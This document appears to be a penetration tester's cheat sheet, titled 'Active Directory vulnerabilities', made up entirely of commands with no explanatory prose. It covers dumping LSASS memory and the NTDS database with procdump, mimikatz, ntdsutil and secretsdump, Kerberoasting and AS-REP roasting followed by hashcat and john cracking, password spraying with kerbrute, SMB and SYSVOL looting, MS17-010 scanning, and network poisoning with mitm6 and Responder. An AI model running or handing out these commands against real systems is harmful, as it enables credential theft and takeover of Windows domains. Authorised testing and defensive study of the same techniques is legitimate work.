L5. Active Directory vulnerabilities

cat /etc/resolv.conf
nmcli dev show eth2
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>
nmap -script broadcast-dhcp-discover

sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --sam
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --lsa
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --ntds

procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1

python3 psexec.py <domain>/<user>:<password>@<ip> "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"

smbclient <domain>/<user>@<ip>
use C$
cd Windows
cd Temp
put procdump.exe
get lsass.dmp
rm procdump.exe
rm lsass.dmp

C:\>mimikatz.exe
sekurlsa::minidump <DUMPFILENAME>
sekurlsa::LogonPasswords

pypykatz lsa minidump <lsass.dmp>

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\Windows\Temp\ntds
ifm: quit
ntdsutil: quit

ntdsutil.exe "activate instance ntfs" "ifm" "Create Full C:\Windows\Temp\ntds" quit quit
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

python3 secretsdump.py <domain>/<user>:<password>@<ip> -just-dc

python3 secretsdump.py -ntds '/home/kali/Downloads/Active Directory/ntds.dit' -system '/home/kali/Downloads/registry/SYSTEM' -outputfile hashs.ntds LOCAL

hashcat -m 1000 <hashes.file> <dictionary.file> --force

python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:'<password'

hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <hashcat | john> -outputfile <output_AS_REP_responses_file>

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>

enum4linux -U <dc-ip> | grep 'user:'
cme smb <ip> -U <user> -p '<password>' --users

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=names.txt <ip>
python kerbrute.py -domain <domain> -users users.txt -passwords passwords.txt -outputfile output.txt

while read ip;do echo $ip; smbmap -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_without_auth_file>
while read ip;do echo $ip; smbmap -u <user> -p '<password>' -d <domain> -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_user_file>

python ldapdomaindump.py -u '<domain>\<user>' -p <password> -o ldapdomaindump -n <ns_ip> <dc_ip>

smbclient -U <user> -L <ip> ///SYSVOL
smbclient \\\\<ip>\\sysvol -U <user>
prompt off
recurse on
lcd /home/kali/Downloads/sysvol
mget ./*

./bloodhound.py -u <username> -p '<passoword>' -d <domain> -ns <ns_ip> -dc <dc_hostname>

python RunFinger.py -i <ip/mask>

nmap -n -Pn -sT -v --script smb-vuln-ms17-010 -p445 --open -oA ms17-010-nmap <ip>
~/tools/wannacry/wannacry -net <ip/mask> -out <ip>-ms17-010-wanna.txt

sudo nmap -Pn -sT --script=vulners -sV --open -oA all-ports-nmap -p 21,22,2222,23,80,8000,8001,8002,8004,8006,8007,8008,8080,8888,88,139,143,389,443,8443,9443,445,623,49152,636,1099,1433,1434,1500,2001,2010,2181,2375,2809,9043,9060,9080,9501,9502,9503,5558,5559,7873,8879,3306,3389,5800-5810,5900,5901,5432,5433,5555,5557,5666,10050,10051,7001,9000,27017,27018,50013,1521-1527,3200-3299,4786,9200,9300,5985,5986,50070,6443,8111,8500,8501,8200,8201,10250 <ip/mask>

cat <ips-file> | xargs -I IP python IOXIDResolver.py -t IP | tee <IOXIDResolver-file>

sudo ./onesixtyone -c snmp_pass.txt -o <onesixtyone-file.txt> <ip/mask>

sudo python3 mitm6.py -i eth2 -v -d <domain>
sudo python3 smbserver.py -ip <local-ip> data /tmp | tee <mitm6_file>

sudo python3 Responder.py -I eth2 -A